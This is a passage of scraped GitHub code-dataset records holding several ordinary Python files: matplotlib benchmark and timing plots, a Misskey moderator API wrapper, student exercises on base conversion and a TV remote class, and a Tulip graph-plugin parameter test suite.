timing\")\n ax.set_xlabel(\"element count\")\n ax.set_ylabel(\"cpu time [s]\")\n ax.set_xscale(\"log\")\n ax.set_yscale(\"log\")\n ax.legend()\n fig.set_tight_layout(True)\n plt.show()\n fig.savefig(f\"./results/timing_vs_element_count.jpg\")\n\n\ndef plot_speedup(classification: BenchmarkClassification):\n\n fig, axs = plt.subplots(1, len(classification))\n\n for i, element_type in enumerate(classification):\n\n std_benchmark_list = classification[element_type][\"std\"]\n std_cpu_time = np.array(\n [std_benchmark.cpu_time_s for std_benchmark in std_benchmark_list]\n )\n std_element_count = np.array(\n [benchmark.element_count for benchmark in std_benchmark_list]\n )\n\n general_benchmark_list = classification[element_type][\"general\"]\n general_cpu_time = np.array(\n [benchmark.cpu_time_s for benchmark in general_benchmark_list]\n )\n general_element_count = np.array(\n [benchmark.element_count for benchmark in general_benchmark_list]\n )\n\n ax = axs[i]\n\n assert (general_element_count == std_element_count).all()\n ax.plot(\n general_element_count,\n std_cpu_time / general_cpu_time,\n )\n ax.set_title(f\"{element_type.name} speed-up vs std\")\n ax.set_xlabel(\"element count\")\n ax.set_ylabel(\"speed-up\")\n ax.legend()\n\n fig.set_tight_layout(True)\n plt.show()\n fig.savefig(f\"./results/speedup.jpg\")\n\n\nif __name__ == \"__main__\":\n result_dct = load_benchmark_results()\n benchmarks_dct = result_dct[\"benchmarks\"]\n classification, benchmarks = parse_benchmarks(benchmarks_dct)\n\n plot_benchmarks(classification)\n plot_speedup(classification)\n","repo_name":"jlapajne/AVX-bitonic-sort","sub_path":"benchmarks/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36964571897","text":"import matplotlib.pyplot as plt\n\n# Corrected data with proper execution times\ndata = {}\ndata[\"floyd-warshal\"] = [0.00, 0.14, 1.12, 3.72, 8.76] # Times in seconds\n\n# Fox execution times in seconds. The failed test for input size 6 is not included.\ndata[\"fox-16\"] = [None, 1.97, 2.92, 5.46, 10.86]\ndata[\"fox-9\"] = [1.82, 2.05, 3.60, 7.81, 17.34]\ndata[\"fox-4\"] = [1.73, 2.15, 5.25, 14.56, 34.39]\ndata[\"fox-1\"] = [1.70, 3.25, 15.59, 49.63, 125.14]\n\ninput_sizes = [6, 300, 600, 900, 1200]\n\n# Plotting the graph with a logarithmic scale and specified colors\nplt.figure(figsize=(14, 8))\n\n# Floyd-Warshal plot with red color\nplt.plot(input_sizes, data[\"floyd-warshal\"], marker='o', color='red', label='Floyd-Warshal')\n\n# Fox plots with specified colors\n# We will use a lambda function to filter out 'None' values for plotting\nplt.plot([size for size, time in zip(input_sizes, data[\"fox-16\"]) if time is not None], \n [time for time in data[\"fox-16\"] if time is not None], \n marker='s', color='blue', label='Fox 16 procs')\n\nplt.plot(input_sizes, data[\"fox-9\"], marker='^', color='yellow', label='Fox 9 procs')\nplt.plot(input_sizes, data[\"fox-4\"], marker='x', color='orange', label='Fox 4 procs')\nplt.plot(input_sizes, data[\"fox-1\"], marker='d', color='green', label='Fox 1 proc') # Added green for contrast\n\n# Setting logarithmic scale for the y-axis\nplt.yscale('log')\n\n# Titles and labels\nplt.title('Execution Time Comparison on a Logarithmic Scale')\nplt.xlabel('Input Size')\nplt.ylabel('Execution Time (seconds, log scale)')\nplt.legend()\nplt.grid(True, which=\"both\", ls=\"--\")\n\n# Show plot\n# plt.savefig('performance-table-pic.png')\nplt.show()\n\n","repo_name":"marosstudenic/parralel-computing-fox-algorithm-min-path-problem","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10533624444","text":"from typing import Optional\n\nfrom mi.framework.http import HTTPSession\nfrom mi.framework.router import Route\n\n\nclass AdminModeratorManager:\n def __init__(self, user_id: Optional[str] = None):\n self.__user_id: Optional[str] = user_id\n\n async def add(self, user_id: Optional[str] = None) -> bool:\n \"\"\"\n Add a user as a moderator\n\n Parameters\n ----------\n user_id : Optional[str], default=None\n ユーザーのID\n\n Returns\n -------\n bool\n 成功したか否か\n \"\"\"\n\n user_id = user_id or self.__user_id\n data = {'userId': user_id}\n res = await HTTPSession.request(Route('POST', '/api/moderators/add'), json=data, auth=True, lower=True)\n return bool(res)\n\n async def remove(self, user_id: Optional[str] = None) -> bool:\n \"\"\"\n Unmoderate a user\n\n Parameters\n ----------\n user_id : Optional[str], default=None\n ユーザーのID\n\n Returns\n -------\n bool\n 成功したか否か\n \"\"\"\n user_id = user_id or self.__user_id\n data = {'userId': user_id}\n res = await HTTPSession.request(Route('POST', '/api/moderators/remove'), json=data, auth=True, lower=True)\n return bool(res)\n","repo_name":"yupix/Mi.py","sub_path":"mi/wrapper/moderator.py","file_name":"moderator.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"32516116211","text":"import sys\nimport collections\n\nclass ExeptionNb(Exception): pass\n\ndef chek_base(baseSrc):\n\ti = 0\n\ttmp = baseSrc\n\tfor x in baseSrc:\n\t\tfor y in tmp:\n\t\t\tif x == y:\n\t\t\t\ti += 1\n\t\t\tif i > 1:\n\t\t\t\tprint(\"Некорректная система счисления (повторяющиеся символы)\")\n\t\t\t\tsys.exit()\n\t\ti = 0\n\n\ndef itoBase(nb, baseSrc = None, baseDst = None):\n\tchek_base(baseSrc)\n\tif baseDst == None:\n\t\tbaseS = len(baseSrc)\n\t\tnb = int(nb)\n\t\td = {}\n\t\tres = list()\n\t\tfor k in range(baseS):\n\t\t\td[k] = baseSrc[k]\n\t\twhile nb >= baseS:\n\t\t\tres.append(d[nb % baseS])\n\t\t\tnb = nb // baseS\n\t\telse:\n\t\t\tres.append(d[nb % baseS])\n\t\t\tres.reverse()\n\t\treturn ''.join(res)\n\telse:\n\t\tbs = len(baseSrc)\n\t\tl = len(nb) - 1\n\t\tlnb = l\n\t\tdd = {}\n\t\tnum = list()\n\t\ti = 0\n\t\tfor k in baseSrc:\n\t\t\tdd[k] = i\n\t\t\ti += 1\n\t\tz = 0\n\t\twhile l >= 0:\n\t\t\ttry:\n\t\t\t\tnum.append(dd[nb[z]] * ((i)**l))\n\t\t\texcept KeyError:\n\t\t\t\tprint(\"не соответствие числа и системы счисления\")\n\t\t\t\tsys.exit()\n\t\t\tl -= 1\n\t\t\tz += 1\n\t\tnum = sum(num)\n\t\tres = itoBase(num, baseDst, None)\n\t\tif type(res) == str:\n\t\t\treturn res\n\ndef main():\n\tav = sys.argv\n\tres = None\n\tif len(av) == 3:\n\t\ttry:\n\t\t\tnb = int(av[1])\n\t\t\tif nb < 0:\n\t\t\t\traise ExeptionNb()\n\t\t\tres = itoBase(nb, av[2])\n\t\t\tprint(res)\n\t\texcept ExeptionNb:\n\t\t\tprint(\"Введено число со знаком, НЕ ВЕРНО\")\n\t\texcept ValueError as err:\n\t\t\tprint(err + \" Введено не число, НЕ ВЕРНО\")\n\telif len(av) == 4:\n\t\tres = itoBase.itoBase(av[1], av[2], av[3])\n\t\tprint(\"Число сконвектировано: \", res)\n\telse:\n\t\tprint(\"некоректное число аргументов\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"nfrolov1992/Python","sub_path":"task1/SRC/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41280800508","text":"import random\nimport time\n\nclass Kumanda():\n\n def __init__(self,tv_durum = \"Kapalı\", tv_sees = 0, kanal_listei = [\"Trt\"], kanal = \"Trt\"):\n self.tv_durum = tv_durum\n self.tv_ses = tv_sees\n self.kanal_listesi = kanal_listei\n self.kanal = kanal\n\n def tv_ac(self):\n if(self.tv_durum == \"Açık\"):\n print(\"Televizyon zaten açık..\")\n else:\n print(\"Televizyon Açılıyor..\")\n self.tv_durum = \"Açık\"\n\n def tv_kapat(self):\n if(self.tv_durum == \"Kapalı\"):\n print(\"Televizyon zaten kapalı..\")\n else:\n print(\"Televizyon Kapanıyor..\")\n self.tv_durum = \"Kapalı\"\n\n def ses_ayarları(self):\n while True:\n cevap = input(\"Sesi azalt: '<'\\nSesi Artır: '>'\\nÇıkış: çıkış\")\n\n if(cevap == \"<\"):\n if(self.tv_ses != 0):\n self.tv_ses -= 1\n print(\"Ses:\", self.tv_ses)\n elif(cevap == '>'):\n if(self.tv_ses != 31):\n self.tv_ses += 1\n print(\"Ses:\", self.tv_ses)\n else:\n print(\"Ses güncellendi:\", self.tv_ses)\n break\n\n def kanal_ekle(self,kanal_ismi):\n print(\"Kanal ekleniyor.\")\n time.sleep(1)\n self.kanal_listesi.append(kanal_ismi)\n print(\"Kanal eklendi.\")\n\n def rastgele_kanal(self):\n rastgele = random.randint(0, len(self.kanal_listesi)-1)\n self.kanal = self.kanal_listesi[rastgele]\n print(\"Şuanki kanal:\",self.kanal)\n\n def __len__(self):\n return len(self.kanal_listesi)\n\n def __str__(self):\n return \"Tv Durumu: {}\\nTv Ses: {}\\nKanal Listesi: {}\\nŞuanki Kanal: {}\\n\".format(self.tv_durum, self.tv_ses, self.kanal_listesi, self.kanal)\n\n\nkumanda = Kumanda()\n\nprint(\"\"\"********************\nTelevizyon Uygulaması\n\n1.Tv Aç\n2.Tv Kapat\n3.Ses Ayarları\n4.Kanal Ekle\n5.Kanal Sayısını Öğrenme\n6.Rastgele Kanala Geçme\n7.Televizyon Bilgileri\n\nÇıkmak için 'q' ya basınız.\n********************\"\"\")\n\nwhile True:\n islem = input(\"İşlemi Seçiniz:\")\n\n if(islem == \"q\"):\n print(\"Program Sonlandırılıyor.\")\n break\n elif(islem == \"1\"):\n kumanda.tv_ac()\n elif(islem == \"2\"):\n kumanda.tv_kapat()\n elif(islem == \"3\"):\n kumanda.ses_ayarları()\n elif(islem == \"4\"):\n kanal_isimleri = input(\"Kanal isimlerini ',' ile ayırarak girin:\")\n eklenecek_kanallar = kanal_isimleri.split(\",\")\n for eklenecekler in eklenecek_kanallar:\n kumanda.kanal_ekle(eklenecekler)\n elif(islem == \"5\"):\n print(\"Kanal Sayısı:\", len(kumanda.kanal_listesi))\n elif(islem == \"6\"):\n kumanda.rastgele_kanal()\n elif(islem == \"7\"):\n print(kumanda)\n else:\n print(\"Geçersiz İşlem\")\n\n","repo_name":"sametcelikbicak/Python","sub_path":"KodlamaEgzersizleri/Nesne Tabanlı Programlama/kumanda_sinifi.py","file_name":"kumanda_sinifi.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"tr","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"27379146819","text":"# This file is part of Tulip (http://tulip.labri.fr)\n#\n# Authors: David Auber and the Tulip development Team\n# from LaBRI, University of Bordeaux\n#\n# Tulip is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License\n# as published by the Free Software Foundation, either version 3\n# of the License, or (at your option) any later version.\n#\n# Tulip is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n# See the GNU General Public License for more details.\n\nimport unittest\nimport sys\n\nfrom tulip import tlp\n\nimport tulipplugins\n\nplugin_name = 'Test Algorithm'\nplugin_author = 'author'\nplugin_date = 'date'\nplugin_info = 'info'\nplugin_version = 'version'\nplugin_group = 'group'\n\nboolean_param_name = 'bool'\nboolean_param_default_value = True\nboolean_param_value = False\n\nint_param_name = 'int'\nint_param_default_value = 5\nint_param_value = -10\n\nfloat_param_name = 'float'\nfloat_param_default_value = 53.35\nfloat_param_value = 156.876\n\nstring_param_name = 'string'\nstring_param_default_value = 'foo'\nstring_param_value = 'bar'\n\nboolean_prop_param_name = 'bool_prop'\nboolean_prop_param_default_value = 'viewSelection'\nboolean_prop_param_value = 'prop_bool'\n\ncolor_prop_param_name = 'color_prop'\ncolor_prop_param_default_value = 'viewColor'\ncolor_prop_param_value = 'prop_color'\n\ndouble_prop_param_name = 'double_prop'\ndouble_prop_param_default_value = 'viewMetric'\ndouble_prop_param_value = 'color_prop'\n\nint_prop_param_name = 'int_prop'\nint_prop_param_default_value = 'viewShape'\nint_prop_param_value = 'prop_int'\n\nlayout_prop_param_name = 'layout_prop'\nlayout_prop_param_default_value = 'viewLayout'\nlayout_prop_param_value = 'prop_layout'\n\nsize_prop_param_name = 'size_prop'\nsize_prop_param_default_value = 'viewSize'\nsize_prop_param_value = 'prop_size'\n\nstring_prop_param_name = 'string_prop'\nstring_prop_param_default_value = 'viewLabel'\nstring_prop_param_value = 'prop_string'\n\nboolean_vec_prop_param_name = 'bool_vec_prop'\nboolean_vec_prop_param_default_value = 'bool_vector'\n\ncolor_vec_prop_param_name = 'color_vec_prop'\ncolor_vec_prop_param_default_value = 'color_vector'\n\ndouble_vec_prop_param_name = 'double_vec_prop'\ndouble_vec_prop_param_default_value = 'double_vector'\n\nint_vec_prop_param_name = 'int_vec_prop'\nint_vec_prop_param_default_value = 'int_vector'\n\ncoord_vec_prop_param_name = 'coord_vec_prop'\ncoord_vec_prop_param_default_value = 'coord_vector'\n\nsize_vec_prop_param_name = 'size_vec_prop'\nsize_vec_prop_param_default_value = 'size_vector'\n\nstring_vec_prop_param_name = 'string_vec_prop'\nstring_vec_prop_param_default_value = 'string_vector'\n\ncolor_param_name = 'color'\ncolor_param_default_value = '(128,128,128,128)'\ncolor_param_value = tlp.Color.Blue\ncolor_param_tuple_value = (0, 0, 255)\n\ncolor_scale_param_name = 'color_scale'\ncolor_scale_param_default_value = '((255,0,0,255),(0,255,0,255),(0,0,255,255))'\ncolor_scale_default_value_dict = {0.0: (255, 0, 0, 255),\n 0.5: (0, 255, 0, 255),\n 1.0: (0, 0, 255, 255)}\ncolor_scale_param_value_dict = {0.0: (255, 0, 255, 255),\n 0.5: (128, 255, 0, 255),\n 1.0: (128, 0, 255, 255)}\ncolor_scale_param_value_list = [(255, 0, 255, 255), (128, 255, 0, 255),\n (128, 0, 255, 255)]\ncolor_scale_param_value = tlp.ColorScale(color_scale_param_value_dict)\n\ndir_param_name = 'dir'\ndir_param_default_value = '/tmp'\ndir_param_value = '/home/toto'\n\nfile_param_name = 'file'\nfile_param_default_value = '/tmp/foo.csv'\nfile_param_value = '/home/toto/bar.csv'\n\nstring_collection_param_name = 'string collection'\nstring_collection_param_default_value = 'foo;bar'\nstring_collection_param_value = 'bar'\n\nout_boolean_param_name = 'bool_out'\nout_boolean_param_value = True\nout_int_param_name = 'int_out'\nout_int_param_value = 2\nout_float_param_name = 'float_out'\nout_float_param_value = 0.5\nout_string_param_name = 'string_out'\nout_string_param_value = 'toto'\n\nparameters_value = {}\n\n\nclass TestAlgorithm(tlp.Algorithm):\n\n def __init__(self, context):\n tlp.Algorithm.__init__(self, context)\n\n self.addBooleanParameter(\n boolean_param_name,\n defaultValue=str(boolean_param_default_value))\n\n self.addColorParameter(\n color_param_name,\n defaultValue=color_param_default_value)\n\n self.addColorScaleParameter(\n color_scale_param_name,\n defaultValue=color_scale_param_default_value)\n\n self.addIntegerParameter(\n int_param_name,\n defaultValue=str(int_param_default_value))\n\n self.addFloatParameter(\n float_param_name,\n defaultValue=str(float_param_default_value))\n\n self.addStringParameter(\n string_param_name,\n defaultValue=str(string_param_default_value))\n\n self.addDirectoryParameter(\n dir_param_name,\n defaultValue=dir_param_default_value)\n\n self.addFileParameter(\n file_param_name,\n defaultValue=file_param_default_value)\n\n self.addStringCollectionParameter(\n string_collection_param_name,\n defaultValue=string_collection_param_default_value)\n\n self.addBooleanPropertyParameter(\n boolean_prop_param_name,\n defaultValue=boolean_prop_param_default_value)\n\n self.addColorPropertyParameter(\n color_prop_param_name,\n defaultValue=color_prop_param_default_value)\n\n self.addDoublePropertyParameter(\n double_prop_param_name,\n defaultValue=double_prop_param_default_value)\n\n self.addIntegerPropertyParameter(\n int_prop_param_name,\n defaultValue=int_prop_param_default_value)\n\n self.addLayoutPropertyParameter(\n layout_prop_param_name,\n defaultValue=layout_prop_param_default_value)\n\n self.addSizePropertyParameter(\n size_prop_param_name,\n defaultValue=size_prop_param_default_value)\n\n self.addStringPropertyParameter(\n string_prop_param_name,\n defaultValue=string_prop_param_default_value)\n\n self.addBooleanVectorPropertyParameter(\n boolean_vec_prop_param_name,\n defaultValue=boolean_vec_prop_param_default_value)\n\n self.addColorVectorPropertyParameter(\n color_vec_prop_param_name,\n defaultValue=color_vec_prop_param_default_value)\n\n self.addDoubleVectorPropertyParameter(\n double_vec_prop_param_name,\n defaultValue=double_vec_prop_param_default_value)\n\n self.addIntegerVectorPropertyParameter(\n int_vec_prop_param_name,\n defaultValue=int_vec_prop_param_default_value)\n\n self.addCoordVectorPropertyParameter(\n coord_vec_prop_param_name,\n defaultValue=coord_vec_prop_param_default_value)\n\n self.addSizeVectorPropertyParameter(\n size_vec_prop_param_name,\n defaultValue=size_vec_prop_param_default_value)\n\n self.addStringVectorPropertyParameter(\n string_vec_prop_param_name,\n defaultValue=string_vec_prop_param_default_value)\n\n self.addBooleanParameter(out_boolean_param_name, outParam=True)\n self.addIntegerParameter(out_int_param_name, outParam=True)\n self.addFloatParameter(out_float_param_name, outParam=True)\n self.addStringParameter(out_string_param_name, outParam=True)\n\n def check(self):\n return (True, 'Ok')\n\n def run(self):\n p = parameters_value\n d = self.dataSet\n p[boolean_param_name] = d[boolean_param_name]\n p[int_param_name] = d[int_param_name]\n p[float_param_name] = d[float_param_name]\n p[string_param_name] = d[string_param_name]\n p[string_collection_param_name] = d[string_collection_param_name]\n\n p[color_param_name] = tlp.Color(d[color_param_name])\n p[color_scale_param_name] = tlp.ColorScale(d[color_scale_param_name])\n\n p[boolean_prop_param_name] = d[boolean_prop_param_name]\n p[color_prop_param_name] = d[color_prop_param_name]\n p[double_prop_param_name] = d[double_prop_param_name]\n p[int_prop_param_name] = d[int_prop_param_name]\n p[layout_prop_param_name] = d[layout_prop_param_name]\n p[size_prop_param_name] = d[size_prop_param_name]\n p[string_prop_param_name] = d[string_prop_param_name]\n p[boolean_vec_prop_param_name] = d[boolean_vec_prop_param_name]\n p[color_vec_prop_param_name] = d[color_vec_prop_param_name]\n p[double_vec_prop_param_name] = d[double_vec_prop_param_name]\n p[int_vec_prop_param_name] = d[int_vec_prop_param_name]\n p[coord_vec_prop_param_name] = d[coord_vec_prop_param_name]\n p[size_vec_prop_param_name] = d[size_vec_prop_param_name]\n p[string_vec_prop_param_name] = d[string_vec_prop_param_name]\n\n d[out_boolean_param_name] = out_boolean_param_value\n d[out_int_param_name] = out_int_param_value\n d[out_float_param_name] = out_float_param_value\n d[out_string_param_name] = out_string_param_value\n\n return True\n\n\ntulipplugins.registerPluginOfGroup(\n 'TestAlgorithm', plugin_name, plugin_author,\n plugin_date, plugin_info, plugin_version, plugin_group)\n\n\nclass TestPluginParameters(unittest.TestCase):\n\n def setUp(self):\n self.graph = tlp.newGraph()\n\n self.boolean_prop = self.graph.getBooleanProperty(\n boolean_prop_param_value)\n\n self.color_prop = self.graph.getColorProperty(\n color_prop_param_value)\n\n self.double_prop = self.graph.getDoubleProperty(\n double_prop_param_value)\n\n self.int_prop = self.graph.getIntegerProperty(\n int_prop_param_value)\n\n self.layout_prop = self.graph.getLayoutProperty(\n layout_prop_param_value)\n\n self.size_prop = self.graph.getSizeProperty(size_prop_param_value)\n\n self.string_prop = self.graph.getStringProperty(\n string_prop_param_value)\n\n self.boolean_vec_prop = self.graph.getBooleanVectorProperty(\n boolean_vec_prop_param_default_value)\n\n self.color_vec_prop = self.graph.getColorVectorProperty(\n color_vec_prop_param_default_value)\n\n self.double_vec_prop = self.graph.getDoubleVectorProperty(\n double_vec_prop_param_default_value)\n\n self.int_vec_prop = self.graph.getIntegerVectorProperty(\n int_vec_prop_param_default_value)\n\n self.coord_vec_prop = self.graph.getCoordVectorProperty(\n coord_vec_prop_param_default_value)\n\n self.size_vec_prop = self.graph.getSizeVectorProperty(\n size_vec_prop_param_default_value)\n\n self.string_vec_prop = self.graph.getStringVectorProperty(\n string_vec_prop_param_default_value)\n\n def tearDown(self):\n self.graph = None\n\n def test_plugin_is_registered(self):\n self.assertIn(plugin_name, tlp.getAlgorithmPluginsList())\n plugin = tlp.PluginLister.pluginInformation(plugin_name)\n self.assertEqual(plugin.category(), 'Algorithm')\n self.assertEqual(plugin.name(), plugin_name)\n self.assertEqual(plugin.author(), plugin_author)\n self.assertEqual(plugin.date(), plugin_date)\n self.assertEqual(plugin.info(), plugin_info)\n self.assertEqual(plugin.release(), plugin_version)\n self.assertEqual(plugin.group(), plugin_group)\n self.assertEqual(plugin.programmingLanguage(), 'Python')\n\n def test_plugin_default_parameters(self):\n plugin_default_params = tlp.getDefaultPluginParameters(plugin_name,\n self.graph)\n\n self.assertIn(boolean_param_name, plugin_default_params)\n self.assertEqual(type(plugin_default_params[boolean_param_name]), bool)\n self.assertEqual(plugin_default_params[boolean_param_name],\n boolean_param_default_value)\n\n self.assertIn(color_param_name, plugin_default_params)\n\n self.assertTrue(isinstance(plugin_default_params[color_param_name],\n tlp.Color))\n\n self.assertEqual(repr(plugin_default_params[color_param_name]),\n color_param_default_value)\n\n self.assertIn(color_scale_param_name,\n plugin_default_params)\n\n self.assertTrue(\n isinstance(plugin_default_params[color_scale_param_name],\n tlp.ColorScale))\n\n self.assertEqual(plugin_default_params[color_scale_param_name],\n tlp.ColorScale(color_scale_default_value_dict))\n\n self.assertIn(int_param_name, plugin_default_params)\n self.assertEqual(type(plugin_default_params[int_param_name]), int)\n self.assertEqual(plugin_default_params[int_param_name],\n int_param_default_value)\n\n self.assertIn(float_param_name, plugin_default_params)\n self.assertEqual(type(plugin_default_params[float_param_name]), float)\n self.assertEqual(plugin_default_params[float_param_name],\n float_param_default_value)\n\n self.assertIn(string_param_name, plugin_default_params)\n self.assertEqual(type(plugin_default_params[string_param_name]), str)\n self.assertEqual(plugin_default_params[string_param_name],\n string_param_default_value)\n\n self.assertIn(string_collection_param_name, plugin_default_params)\n self.assertEqual(\n type(plugin_default_params[string_collection_param_name]), str)\n self.assertEqual(plugin_default_params[string_collection_param_name],\n string_collection_param_default_value.split(';')[0])\n\n self.assertIn(boolean_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[boolean_prop_param_name],\n tlp.BooleanProperty))\n self.assertEqual(\n plugin_default_params[boolean_prop_param_name].getName(),\n boolean_prop_param_default_value)\n\n self.assertIn(color_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[color_prop_param_name],\n tlp.ColorProperty))\n self.assertEqual(\n plugin_default_params[color_prop_param_name].getName(),\n color_prop_param_default_value)\n\n self.assertIn(double_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[double_prop_param_name],\n tlp.DoubleProperty))\n self.assertEqual(\n plugin_default_params[double_prop_param_name].getName(),\n double_prop_param_default_value)\n\n self.assertIn(int_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[int_prop_param_name],\n tlp.IntegerProperty))\n self.assertEqual(\n plugin_default_params[int_prop_param_name].getName(),\n int_prop_param_default_value)\n\n self.assertIn(layout_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[layout_prop_param_name],\n tlp.LayoutProperty))\n self.assertEqual(\n plugin_default_params[layout_prop_param_name].getName(),\n layout_prop_param_default_value)\n\n self.assertIn(size_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[size_prop_param_name],\n tlp.SizeProperty))\n self.assertEqual(\n plugin_default_params[size_prop_param_name].getName(),\n size_prop_param_default_value)\n\n self.assertIn(string_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[string_prop_param_name],\n tlp.StringProperty))\n self.assertEqual(\n plugin_default_params[string_prop_param_name].getName(),\n string_prop_param_default_value)\n\n self.assertIn(boolean_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[boolean_vec_prop_param_name],\n tlp.BooleanVectorProperty))\n self.assertEqual(\n plugin_default_params[boolean_vec_prop_param_name].getName(),\n boolean_vec_prop_param_default_value)\n\n self.assertIn(color_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[color_vec_prop_param_name],\n tlp.ColorVectorProperty))\n self.assertEqual(\n plugin_default_params[color_vec_prop_param_name].getName(),\n color_vec_prop_param_default_value)\n\n self.assertIn(double_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[double_vec_prop_param_name],\n tlp.DoubleVectorProperty))\n self.assertEqual(\n plugin_default_params[double_vec_prop_param_name].getName(),\n double_vec_prop_param_default_value)\n\n self.assertIn(int_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[int_vec_prop_param_name],\n tlp.IntegerVectorProperty))\n self.assertEqual(\n plugin_default_params[int_vec_prop_param_name].getName(),\n int_vec_prop_param_default_value)\n\n self.assertIn(coord_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[coord_vec_prop_param_name],\n tlp.CoordVectorProperty))\n self.assertEqual(\n plugin_default_params[coord_vec_prop_param_name].getName(),\n coord_vec_prop_param_default_value)\n\n self.assertIn(size_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[size_vec_prop_param_name],\n tlp.SizeVectorProperty))\n self.assertEqual(\n plugin_default_params[size_vec_prop_param_name].getName(),\n size_vec_prop_param_default_value)\n\n self.assertIn(string_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[string_vec_prop_param_name],\n tlp.StringVectorProperty))\n self.assertEqual(\n plugin_default_params[string_vec_prop_param_name].getName(),\n string_vec_prop_param_default_value)\n\n def test_plugin_in_parameters(self):\n plugin_params = tlp.getDefaultPluginParameters(plugin_name, self.graph)\n\n plugin_params[boolean_param_name] = boolean_param_value\n plugin_params[int_param_name] = int_param_value\n plugin_params[float_param_name] = float_param_value\n plugin_params[string_param_name] = string_param_value\n plugin_params[\n string_collection_param_name] = string_collection_param_value\n plugin_params[color_scale_param_name] = color_scale_param_value\n plugin_params[color_param_name] = color_param_value\n\n plugin_params[boolean_prop_param_name] = self.boolean_prop\n plugin_params[color_prop_param_name] = self.color_prop\n plugin_params[double_prop_param_name] = self.double_prop\n plugin_params[int_prop_param_name] = self.int_prop\n plugin_params[layout_prop_param_name] = self.layout_prop\n plugin_params[size_prop_param_name] = self.size_prop\n plugin_params[string_prop_param_name] = self.string_prop\n plugin_params[boolean_vec_prop_param_name] = self.boolean_vec_prop\n plugin_params[color_vec_prop_param_name] = self.color_vec_prop\n plugin_params[double_vec_prop_param_name] = self.double_vec_prop\n plugin_params[int_vec_prop_param_name] = self.int_vec_prop\n plugin_params[coord_vec_prop_param_name] = self.coord_vec_prop\n plugin_params[size_vec_prop_param_name] = self.size_vec_prop\n plugin_params[string_vec_prop_param_name] = self.string_vec_prop\n\n plugin_ret = self.graph.applyAlgorithm(plugin_name, plugin_params)\n self.assertTrue(plugin_ret[0])\n\n self.assertEqual(parameters_value[boolean_param_name],\n boolean_param_value)\n self.assertEqual(parameters_value[int_param_name], int_param_value)\n self.assertEqual(parameters_value[float_param_name], float_param_value)\n self.assertEqual(parameters_value[string_param_name],\n string_param_value)\n self.assertEqual(parameters_value[string_param_name],\n string_param_value)\n self.assertEqual(parameters_value[string_collection_param_name],\n string_collection_param_value)\n self.assertEqual(parameters_value[color_param_name], color_param_value)\n self.assertEqual(parameters_value[color_scale_param_name],\n color_scale_param_value)\n\n self.assertEqual(parameters_value[boolean_prop_param_name],\n self.boolean_prop)\n self.assertEqual(parameters_value[color_prop_param_name],\n self.color_prop)\n self.assertEqual(parameters_value[double_prop_param_name],\n self.double_prop)\n self.assertEqual(parameters_value[int_prop_param_name], self.int_prop)\n self.assertEqual(parameters_value[layout_prop_param_name],\n self.layout_prop)\n self.assertEqual(parameters_value[size_prop_param_name],\n self.size_prop)\n self.assertEqual(parameters_value[string_prop_param_name],\n self.string_prop)\n self.assertEqual(parameters_value[boolean_vec_prop_param_name],\n self.boolean_vec_prop)\n self.assertEqual(parameters_value[color_vec_prop_param_name],\n self.color_vec_prop)\n self.assertEqual(parameters_value[double_vec_prop_param_name],\n self.double_vec_prop)\n self.assertEqual(parameters_value[int_vec_prop_param_name],\n self.int_vec_prop)\n self.assertEqual(parameters_value[coord_vec_prop_param_name],\n self.coord_vec_prop)\n self.assertEqual(parameters_value[size_vec_prop_param_name],\n self.size_vec_prop)\n self.assertEqual(parameters_value[string_vec_prop_param_name],\n self.string_vec_prop)\n\n plugin_params[color_param_name] = color_param_tuple_value\n del parameters_value[color_param_name]\n\n plugin_params[color_scale_param_name] = color_scale_param_value_dict\n del parameters_value[color_scale_param_name]\n\n plugin_ret = self.graph.applyAlgorithm(plugin_name, plugin_params)\n self.assertTrue(plugin_ret[0])\n\n self.assertEqual(parameters_value[color_param_name], color_param_value)\n self.assertEqual(parameters_value[color_scale_param_name],\n color_scale_param_value)\n\n plugin_params[color_scale_param_name] = color_scale_param_value_list\n del parameters_value[color_scale_param_name]\n\n plugin_ret = self.graph.applyAlgorithm(plugin_name, plugin_params)\n self.assertTrue(plugin_ret[0])\n\n self.assertEqual(parameters_value[color_scale_param_name],\n color_scale_param_value)\n\n plugin_params[string_collection_param_name] = 'toto'\n\n with self.assertRaises(Exception) as cm:\n plugin_ret = self.graph.applyAlgorithm(plugin_name, plugin_params)\n self.assertContains(\n cm.exception.args[0], 'Possible values are : foo, bar')\n\n def test_plugin_out_parameters(self):\n 